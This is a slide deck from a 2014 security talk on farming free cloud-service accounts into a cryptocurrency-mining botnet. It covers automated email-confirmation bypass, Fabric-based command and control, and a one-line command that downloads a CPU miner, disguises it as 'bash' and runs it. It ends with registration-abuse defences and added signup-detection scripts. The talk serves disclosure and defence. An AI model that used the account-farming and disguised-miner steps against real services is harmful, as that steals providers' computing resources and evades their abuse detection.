CloudBots:
Harvesting Crypto Coins
Like a Botnet Farmer
2014 August 6
2
…and Violating Terms of Service
Building a Botnet with Free Cloud-based Services
3
Main Topics
•  Could we build a botnet from freely available cloud
services?
•  Will we see the rise of more cloud based botnets?
•  Should insufficient anti-automation be considered a
top ten vulnerability?
What are these guys talking about?
Overview
4
Platform as a Service
Cloud PaaS
5
Platform as a Service
Free Cloud Services
<Insert with other providers later>
Reference: http://goo.gl/AZ4nYp
6
Development Environment as a Service
Free Cloud Services
AUTOMATION
Scripting the Cloud
8
Automating Registration
•  Hurdles
-  Email address confirmation
-  CAPTCHA
-  Phone/SMS
-  Credit Card
Usability vs Security
Cloud Providers (In)Security
9
Anti-Automation
Fraudulent Account Registration
More Anti-Automation
Email Confirmation Only
66%
33%
EMAIL CAPTCHA CREDIT CARD PHONE
10
Anti-Automation Techniques
•  Email address confirmation
•  CAPTCHA
•  Phone/SMS
•  Credit Card
Usability vs Security
Cloud Providers (In)Security
11
12
Automated email
processing
-  Wildcard localpart
*@domain.com
-  Extract important information
from incoming emails
-  Grep for confirmation token
links and request them
Account registration
-  Automatic request sent to
account activation links
SMTP Services
Email Confirmation Token Processing
local-part@domain.tld
Email Address Anatomy
14
Using the Google AppEngine InboundMailHandler
- first.last.001@cloudbotmail.appspotmail.com
- first.last.002@cloudbotmail.appspotmail.com
- first.last.003@cloudbotmail.appspotmail.com
- first.last.004@cloudbotmail.appspotmail.com
- first.last.005@cloudbotmail.appspotmail.com
- first.last.006@cloudbotmail.appspotmail.com
- first.last.007@cloudbotmail.appspotmail.com
- first.last.008@cloudbotmail.appspotmail.com
- first.last.009@cloudbotmail.appspotmail.com
- first.last.010@cloudbotmail.appspotmail.com
Google App Engine
Detection issues
15
Unlimited usernames
-  Prevent pattern recognition
-  Pull from real world examples
[local-part from dump]@domain.tld
Realistic Randomness
Real Email Addresses
16
Unlimited domains
-  freedns.afraid.org
-  Prevent detection
-  Thousands of unique email
domains
SMTP Services
Plethora of Email Addresses
17
Unlimited email addresses
Free DNS Subdomains
18
What do we need?
•  Free email relay
-  Free MX registration
•  Process wildcards
-  *@domain.tld
•  Send unlimited messages
-  Unrestricted SMTP to HTTP POST/JSON requests
Free Signups
Receiving Email and Processing
19
Inbound Mail As A Service
Free Cloud Services
<Insert with other providers later>
Reference: http://goo.gl/yqoh6U
20
Automated email
processing
-  Extract important information
from incoming emails
-  Grep for confirmation token
links and request them
Account registration
-  Automatic request sent to
account activation links
SMTP Services
Email Confirmation Token Processing
Reference: http://bishopfox.github.io/anti-anti-automation/
21
<Insert wall of
random email
addresses>
Realistic Randomness
Unique Email Addresses
Avoid Pattern Recognition
DEMONSTRATION
Automatic Account Creation
23
Automated Registration Workflow
Email Addresses
24
MongoDB
•  MongoLab
•  MongoHQ
Keeping track of all accounts
Storing Account Information
FUNTIVITIES
Botnets Are Fun!
26
What can we do?
•  Distributed Network Scanning
•  Distributed Password Cracking
•  DDoS
•  Click-fraud
•  Crypto Currency Mining
•  Data Storage
Now we have a botnet! Fun!
Botnet Activities
27
Refer Fake Friends
Unlimited Storage Space
28
Refer Fake Friends
Unlimited Storage Space
29
What are we using?
•  Fabric
-  Fabric is a Python library and command-line tool for streamlining the use of SSH for application deployment or systems administration tasks.
•  fab check_hosts -P -z 20
•  fab run_command
Botnet C2
Command & Control
30
Unique Amazon IP Addresses
Distributed Command
[na1.cloudbox.net:2352]: curl http://icanhazip.com
4.109.182.13
[eu1.cloudbox.net:3127]: curl http://icanhazip.com
126.34.56.254
[na1.cloudbox.net:10660]: curl http://icanhazip.com
58.251.42.128
[na1.cloudbox.net:15627]: curl http://icanhazip.com
74.216.236.72
[na1.cloudbox.net:8000]: curl http://icanhazip.com
28.228.253.19
[na1.cloudbox.net:4028]: curl http://icanhazip.com
64.216.37.252
31
Make money, money
•  Deploying miners
•  One command for $$$
All your processors are belong to us
Litecoin Mining
if [ ! -f bash ]; then wget http://sourceforge.net/projects/
cpuminer/files/pooler-cpuminer-2.3.2-linux-x86_64.tar.gz && tar
zxfv pooler-cpuminer-2.3.2-linux-x86_64.tar.gz && rm pooler-
cpuminer-2.3.2-linux-x86_64.tar.gz && mv minerd bash; fi;
screen ./bash –url=stratum+tcp://pool.mine-litecoin.com --
userpass=ninja.47:47; rm bash
32
Load After Crypto Currency Mining
Distributed Command
ID | Host | Status
----------------------------------------
0 | na1.cloudbox.net:1678 | 2 users, load average: 37.08, 37.60, 32.51
1 | na1.cloudbox.net:15121| 1 user, load average: 16.35, 15.35, 12.00
2 | na1.cloudbox.net:11631| 1 user, load average: 19.65, 18.46, 14.38
3 | na1.cloudbox.net:4358 | 2 users, load average: 23.10, 22.91, 18.95
4 | na1.cloudbox.net:1212 | 1 user, load average: 19.60, 18.47, 14.41
5 | na1.cloudbox.net:5841 | 1 user, load average: 19.97, 18.61, 14.52
6 | eu1.cloudbox.net:3025 | 1 user, load average: 19.27, 18.37, 14.33
7 | eu1.cloudbox.net:6892 | 2 users, load average: 19.65, 18.46, 14.38
8 | eu1.cloudbox.net:2038 | 1 user, load average: 18.85, 17.43, 13.45
9 | na1.cloudbox.net:5235 | 1 user, load average: 18.55, 17.32, 13.38
10 | na1.cloudbox.net:1122 | 1 user, load average: 26.04, 25.57, 20.02
33
All your processors are belong to us
Litecoin Mining
CLOUD BREAKOUT
Bypassing Restrictions
DETECTION
No one can catch a ninja!
36
Automatic Backups
•  Propagate to other similar services
-  e.g. MongoLab <-> MongoHQ
•  Infrastructure across multiple service
providers
•  Easily migrated
Armadillo Up ™
Disaster Recovery Plan
RISING TREND
Active Attacks
38
Adaptation
Cloud Provider Registration
39
Adaptation
Cloud Provider Registration
40
Adaptation
Cloud Provider Registration
41
Crypto Coins & DDoS
Clouds Under Siege
42
Crypto Coins & DDoS
Clouds Under Siege
PROTECTION
Bot Busters
44
What can we do?
•  Logic puzzles
•  Sound output
•  Credit card validation
•  Live operators
•  Limited-use account
•  Heuristic checks
•  Federated identity systems
Usability vs Security
Protection
Reference: http://www.w3.org/TR/2003/WD-turingtest-20031105/#solutions
45
What should we do?
•  Analyzing properties of Sybil
accounts
•  Analyzing the arrival rate and
distribution of accounts
•  Flag accounts registered with emails
from newly registered domain names
•  Email verification
•  CAPTCHAs
•  IP Blacklisting
•  Phone/SMS verification
•  Automatic pattern recognition
At Abuse vs At Registration
Protection
Reference: https://www.usenix.org/system/files/conference/usenixsecurity13/sec13-paper_thomas.pdf
46
At Abuse vs At Registration
Protection
Advanced techniques
•  Signup flow events
-  Detect common activities after signup
•  User-agent
-  A registration bot may generate a different
user-agent for each signup or use uncommon
user-agents
•  Form submission timing
-  A bot that doesn't mimic human behavior by
performing certain actions too quickly can be
detected
Reference: https://www.usenix.org/system/files/conference/usenixsecurity13/sec13-paper_thomas.pdf
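Added example (not part of the original slides and not the presenters' code): a provider-side sketch of the registration checks listed on the two Protection slides above, run over constructed signup records. The field names, thresholds, IP addresses and user-agent strings are assumptions; domain_age_days is assumed to come from a separate domain-registration lookup.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=10)  # assumed look-back window for the cluster checks
MIN_FORM_SECONDS = 3.0          # assumed floor for a human completing the form
NEW_DOMAIN_DAYS = 30            # assumed cut-off for a "newly registered" domain
BURST = 3                       # assumed cluster size that is worth flagging


def template(local_part):
    """Collapse digit runs so first.last.001 and first.last.002 compare equal."""
    return re.sub(r"\d+", "#", local_part.lower())


def windows(members):
    """For each event, yield the events arriving within WINDOW after it."""
    for i, first in enumerate(members):
        yield [e for e in members[i:] if e["ts"] - first["ts"] <= WINDOW]


def flag_signups(events):
    """Return {email: sorted reasons} for every signup that trips a check."""
    events = sorted(events, key=lambda e: e["ts"])
    reasons = defaultdict(set)
    by_domain, by_template, by_ip = (defaultdict(list) for _ in range(3))

    for ev in events:
        local, _, domain = ev["email"].rpartition("@")
        domain = domain.lower()
        # Form submission timing: the form came back faster than a person types.
        if ev["form_seconds"] < MIN_FORM_SECONDS:
            reasons[ev["email"]].add("fast_form")
        # Email from a newly registered domain name.
        if ev["domain_age_days"] < NEW_DOMAIN_DAYS:
            reasons[ev["email"]].add("new_domain")
        by_domain[domain].append(ev)
        by_ip[ev["ip"]].append(ev)
        tpl = template(local)
        if "#" in tpl:  # only numbered local-parts can form a counter series
            by_template[(tpl, domain)].append(ev)

    # Arrival rate per email domain, and numbered local-parts sharing one
    # template. A production system would compare the domain rate against that
    # domain's own baseline, since large mail providers always arrive in bursts.
    for groups, label in ((by_domain, "domain_burst"),
                          (by_template, "templated_localpart")):
        for members in groups.values():
            for cluster in windows(members):
                if len(cluster) >= BURST:
                    for ev in cluster:
                        reasons[ev["email"]].add(label)

    # User-agent: one source address presenting a different agent per signup.
    for members in by_ip.values():
        for cluster in windows(members):
            if len({e["user_agent"] for e in cluster}) >= BURST:
                for ev in cluster:
                    reasons[ev["email"]].add("ua_churn")

    return {email: sorted(r) for email, r in reasons.items()}


def _ev(minute, ip, email, ua, form_seconds, domain_age_days):
    """Build one constructed signup record."""
    return {"ts": datetime(2014, 8, 6, 12, 0) + timedelta(minutes=minute),
            "ip": ip, "email": email, "user_agent": ua,
            "form_seconds": form_seconds, "domain_age_days": domain_age_days}


# Constructed sample data. The numbered addresses reuse the pattern shown on
# the Google App Engine slide; everything else is made up for the example.
BOT_DOMAIN = "cloudbotmail.appspotmail.com"
SIGNUPS = [
    _ev(0, "198.51.100.7", "first.last.001@" + BOT_DOMAIN, "UA-sample-A", 0.4, 2000),
    _ev(1, "198.51.100.7", "first.last.002@" + BOT_DOMAIN, "UA-sample-B", 0.6, 2000),
    _ev(2, "198.51.100.7", "first.last.003@" + BOT_DOMAIN, "UA-sample-C", 0.5, 2000),
    _ev(3, "198.51.100.8", "first.last.004@" + BOT_DOMAIN, "UA-sample-A", 0.5, 2000),
    _ev(4, "203.0.113.5", "alice@example.org", "UA-sample-A", 41.0, 5000),
    _ev(9, "203.0.113.9", "bob1984@example.org", "UA-sample-B", 28.0, 5000),
    _ev(30, "192.0.2.44", "carol@fresh-mail.example", "UA-sample-A", 35.0, 4),
]

if __name__ == "__main__":
    for email, why in flag_signups(SIGNUPS).items():
        print(email, why)
```

Each reason is a signal to combine and review, not a verdict: a lone new_domain or fast_form hit is weak, while the numbered addresses trip three or four checks at once.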
THANK YOU
Oscar Salazar @tracertea
Rob Ragan @sweepthatleg
CONTACT@BISHOPFOX.COM

IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
🐬 The future of MySQL is Postgres 🐘
🐬  The future of MySQL is Postgres   🐘🐬  The future of MySQL is Postgres   🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Allon Mureinik
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 

Recently uploaded (20)

The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live StreamsTop 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
🐬 The future of MySQL is Postgres 🐘
🐬  The future of MySQL is Postgres   🐘🐬  The future of MySQL is Postgres   🐘
🐬 The future of MySQL is Postgres 🐘
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 

CloudBots - Harvesting Crypto Currency Like a Botnet Farmer

  • 1. CloudBots: Harvesting Crypto Coins Like a Botnet Farmer 2014 August 6
  • 2. …and Violating Terms of Service Building a Botnet with Free Cloud-based Services
  • 3. Main Topics • Could we build a botnet from freely available cloud services? • Will we see the rise of more cloud-based botnets? • Should insufficient anti-automation be considered a top ten vulnerability? What are these guys talking about? Overview
  • 4. Platform as a Service Cloud PaaS
  • 5. Platform as a Service Free Cloud Services <Insert with other providers later> Reference: http://goo.gl/AZ4nYp
  • 6. Development Environment as a Service Free Cloud Services
  • 8. Automating Registration • Hurdles - Email address confirmation - CAPTCHA - Phone/SMS - Credit Card Usability vs Security Cloud Providers (In)Security
  • 9. Anti-Automation Fraudulent Account Registration More Anti-Automation Email Confirmation Only 66% 33% EMAIL CAPTCHA CREDIT CARD PHONE
  • 10. Anti-Automation Techniques • Email address confirmation • CAPTCHA • Phone/SMS • Credit Card Usability vs Security Cloud Providers (In)Security
  • 11.
  • 12. Automated email processing - Wildcard localpart *@domain.com - Extract important information from incoming emails - Grep for confirmation token links and request them Account registration - Automatic request sent to account activation links SMTP Services Email Confirmation Token Processing
  • 14. Using the Google AppEngine InboundMailHandler - first.last.001@cloudbotmail.appspotmail.com - first.last.002@cloudbotmail.appspotmail.com - first.last.003@cloudbotmail.appspotmail.com - first.last.004@cloudbotmail.appspotmail.com - first.last.005@cloudbotmail.appspotmail.com - first.last.006@cloudbotmail.appspotmail.com - first.last.007@cloudbotmail.appspotmail.com - first.last.008@cloudbotmail.appspotmail.com - first.last.009@cloudbotmail.appspotmail.com - first.last.010@cloudbotmail.appspotmail.com Google App Engine Detection issues
  • 15. Unlimited usernames - Prevent pattern recognition - Pull from real world examples [local-part from dump]@domain.tld Realistic Randomness Real Email Addresses
  • 16. Unlimited domains - freedns.afraid.org - Prevent detection - Thousands of unique email domains SMTP Services Plethora of Email Addresses
  • 18. What do we need? • Free email relay - Free MX registration • Process wildcards - *@domain.tld • Send unlimited messages - Unrestricted SMTP to HTTP POST/JSON requests Free Signups Receiving Email and Processing
  • 19. Inbound Mail As A Service Free Cloud Services <Insert with other providers later> Reference: http://goo.gl/yqoh6U
  • 20. Automated email processing - Extract important information from incoming emails - Grep for confirmation token links and request them Account registration - Automatic request sent to account activation links SMTP Services Email Confirmation Token Processing Reference: http://bishopfox.github.io/anti-anti-automation/
  • 21. <Insert wall of random email addresses> Realistic Randomness Unique Email Addresses Avoid Pattern Recognition
  • 24. MongoDB • MongoLab • MongoHQ Keeping track of all accounts Storing Account Information
  • 26. What can we do? • Distributed Network Scanning • Distributed Password Cracking • DDoS • Click-fraud • Crypto Currency Mining • Data Storage Now we have a botnet! Fun! Botnet Activities
  • 29. What are we using? • Fabric - Fabric is a Python library and command-line tool for streamlining the use of SSH for application deployment or systems administration tasks. • fab check_hosts -P -z 20 • fab run_command Botnet C2 Command & Control
  • 30. Unique Amazon IP Addresses Distributed Command
        [na1.cloudbox.net:2352]: curl http://icanhazip.com
        4.109.182.13
        [eu1.cloudbox.net:3127]: curl http://icanhazip.com
        126.34.56.254
        [na1.cloudbox.net:10660]: curl http://icanhazip.com
        58.251.42.128
        [na1.cloudbox.net:15627]: curl http://icanhazip.com
        74.216.236.72
        [na1.cloudbox.net:8000]: curl http://icanhazip.com
        28.228.253.19
        [na1.cloudbox.net:4028]: curl http://icanhazip.com
        64.216.37.252
  • 31. 31 Make money, money •  Deploying miners •  One command for $$$ All your processors are belong to us Litecoin Mining if [ ! -f bash ]; then wget http://sourceforge.net/projects/ cpuminer/files/pooler-cpuminer-2.3.2-linux-x86_64.tar.gz && tar zxfv pooler-cpuminer-2.3.2-linux-x86_64.tar.gz && rm pooler- cpuminer-2.3.2-linux-x86_64.tar.gz && mv minerd bash; fi; screen ./bash –url=stratum+tcp://pool.mine-litecoin.com -- userpass=ninja.47:47; rm bash
  • 32. Load After Crypto Currency Mining Distributed Command
        ID | Host                   | Status
        ----------------------------------------
        0  | na1.cloudbox.net:1678  | 2 users, load average: 37.08, 37.60, 32.51
        1  | na1.cloudbox.net:15121 | 1 user, load average: 16.35, 15.35, 12.00
        2  | na1.cloudbox.net:11631 | 1 user, load average: 19.65, 18.46, 14.38
        3  | na1.cloudbox.net:4358  | 2 users, load average: 23.10, 22.91, 18.95
        4  | na1.cloudbox.net:1212  | 1 user, load average: 19.60, 18.47, 14.41
        5  | na1.cloudbox.net:5841  | 1 user, load average: 19.97, 18.61, 14.52
        6  | eu1.cloudbox.net:3025  | 1 user, load average: 19.27, 18.37, 14.33
        7  | eu1.cloudbox.net:6892  | 2 users, load average: 19.65, 18.46, 14.38
        8  | eu1.cloudbox.net:2038  | 1 user, load average: 18.85, 17.43, 13.45
        9  | na1.cloudbox.net:5235  | 1 user, load average: 18.55, 17.32, 13.38
        10 | na1.cloudbox.net:1122  | 1 user, load average: 26.04, 25.57, 20.02
  • 33. All your processors are belong to us Litecoin Mining
  • 35. DETECTION No one can catch a ninja!
  • 36. Automatic Backups • Propagate to other similar services - e.g. MongoLab <-> MongoHQ • Infrastructure across multiple service providers • Easily migrated Armadillo Up ™ Disaster Recovery Plan
  • 41. Crypto Coins & DDoS Clouds Under Siege
  • 42. Crypto Coins & DDoS Clouds Under Siege
  • 44. What can we do? • Logic puzzles • Sound output • Credit card validation • Live operators • Limited-use account • Heuristic checks • Federated identity systems Usability vs Security Protection Reference: http://www.w3.org/TR/2003/WD-turingtest-20031105/#solutions
  • 45. What should we do? • Analyzing properties of Sybil accounts • Analyzing the arrival rate and distribution of accounts • Flag accounts registered with emails from newly registered domain names • Email verification • CAPTCHAs • IP Blacklisting • Phone/SMS verification • Automatic pattern recognition At Abuse vs At Registration Protection Reference: https://www.usenix.org/system/files/conference/usenixsecurity13/sec13-paper_thomas.pdf
  • 46. At Abuse vs At Registration Protection Advanced techniques • Signup flow events - Detect common activities after signup • User-agent - A registration bot may generate a different user-agent for each signup or use uncommon user-agents • Form submission timing - A bot that doesn't mimic human behavior by performing certain actions too quickly can be detected Reference: https://www.usenix.org/system/files/conference/usenixsecurity13/sec13-paper_thomas.pdf
  • 47. THANK YOU Oscar Salazar @tracertea Rob Ragan @sweepthatleg CONTACT@BISHOPFOX.COM
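
The registration-time checks listed on slides 45 and 46 (arrival rate per email domain, pattern recognition on addresses, user-agent variation per source, form submission timing) can be combined into one scoring pass over signup events. This is an added example, not code from the deck or its authors; the thresholds, flag names, placeholder user-agent strings and sample events are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

MIN_FILL_SECONDS = 3.0               # assumed: a human needs longer to fill the form
BURST_WINDOW = timedelta(minutes=10)
BURST_LIMIT = 3                      # assumed: signups per email domain per window
SERIAL_LIMIT = 3                     # assumed: accounts sharing one local-part stem
UA_LIMIT = 3                         # assumed: distinct user-agents per source IP

# Constructed sample events: (time, email, source IP, user-agent, seconds to submit)
SIGNUPS = [
    ("2014-08-06T10:00:01", "first.last.001@mail.example", "198.51.100.7", "UA-a", 0.8),
    ("2014-08-06T10:00:09", "first.last.002@mail.example", "198.51.100.7", "UA-b", 0.9),
    ("2014-08-06T10:00:15", "first.last.003@mail.example", "198.51.100.7", "UA-c", 1.1),
    ("2014-08-06T10:02:00", "alice@corp.example", "203.0.113.20", "UA-a", 41.0),
    ("2014-08-06T11:30:00", "bob77@home.example", "203.0.113.21", "UA-d", 2.0),
]

def score_signups(events):
    """Return {email: sorted list of heuristic flags} for every flagged signup."""
    rows = sorted((datetime.fromisoformat(t), e.lower(), ip, ua, fill)
                  for t, e, ip, ua, fill in events)
    by_domain, by_stem, uas_by_ip = defaultdict(list), defaultdict(list), defaultdict(set)
    for ts, email, ip, ua, _ in rows:
        local, domain = email.rsplit("@", 1)
        by_domain[domain].append((ts, email))
        # Strip a trailing counter so first.last.001/002/003 share one stem.
        stem = re.sub(r"[._-]?\d+$", "", local)
        by_stem[(stem, domain)].append(email)
        uas_by_ip[ip].add(ua)
    flags = defaultdict(set)
    for ts, email, ip, ua, fill in rows:
        if fill < MIN_FILL_SECONDS:
            flags[email].add("fast-submit")
        if len(uas_by_ip[ip]) >= UA_LIMIT:
            flags[email].add("user-agent-churn")
    for emails in by_stem.values():
        if len(emails) >= SERIAL_LIMIT:
            for email in emails:
                flags[email].add("serial-local-part")
    for seen in by_domain.values():
        start = 0                    # sliding window over time-sorted signups
        for end in range(len(seen)):
            while seen[end][0] - seen[start][0] > BURST_WINDOW:
                start += 1
            if end - start + 1 >= BURST_LIMIT:
                for _, email in seen[start:end + 1]:
                    flags[email].add("domain-burst")
    return {email: sorted(f) for email, f in flags.items()}

if __name__ == "__main__":
    for email, reasons in score_signups(SIGNUPS).items():
        print(email, reasons)
```

A single flag such as `fast-submit` is weak evidence on its own; the three serial accounts stand out because four independent signals agree.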